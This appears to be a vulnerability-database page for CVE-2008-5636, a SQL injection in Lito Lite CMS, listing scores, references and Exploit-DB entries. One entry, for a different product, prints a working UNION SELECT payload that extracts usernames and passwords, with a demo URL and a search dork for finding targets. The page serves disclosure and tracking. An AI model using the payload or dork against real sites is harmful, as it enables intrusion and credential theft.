CVE-2008-5636
Published 2008-12-17
CVE-2008-5636: SQL injection vulnerability in cate.php in Lito Lite CMS, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the…
Priority: P3 36, medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.12% (62.2th percentile)
SQL injection vulnerability in cate.php in Lito Lite CMS, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the cid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lovedesigner | lito_lite_cms | — | — |
No detection rules found.
Exploit-DB
Lito Lite CMS - 'cid' SQL Injection
exploitdb·2008-11-29
CVE-2008-5636 Lito Lite CMS - 'cid' SQL Injection
---
#!/usr/bin/perl -w
#===========================================================
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
#===========================================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : Lito Lite CMS
#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip
#########################
Exploit-DB
MunzurSoft Wep Portal W3 - 'kat' SQL Injection
exploitdb·2008-10-10
CVE-2008-4573 MunzurSoft Wep Portal W3 - 'kat' SQL Injection
---
Author : LUPUS
Home : www.megaturks.net / www.biyosecurity.com
E-Mail : By[nokta]lupus @gmail.com
Down : http://www.aspindir.com/indir.asp?ID=5636
Dork : "MunzurSoft Wep Portal W3"
Demo : http://www.munzursoft.somee.com/www/kategori.asp?kat=2%20union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
Exploit
union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
Greetz : ENO7 - Liz0zim - Kerem125 - Prens - SaO - The_BekiR - h4ckinger - ZeberuS
Note: What matters is being human.
# milw0rm.com [2008-10-10]
No writeups or analysis indexed.
http://secunia.com/advisories/32910
http://securityreason.com/securityalert/4779
http://www.securityfocus.com/bid/32538
http://www.vupen.com/english/advisories/2008/3300
https://exchange.xforce.ibmcloud.com/vulnerabilities/46923
https://www.exploit-db.com/exploits/7294
2008-12-17
Published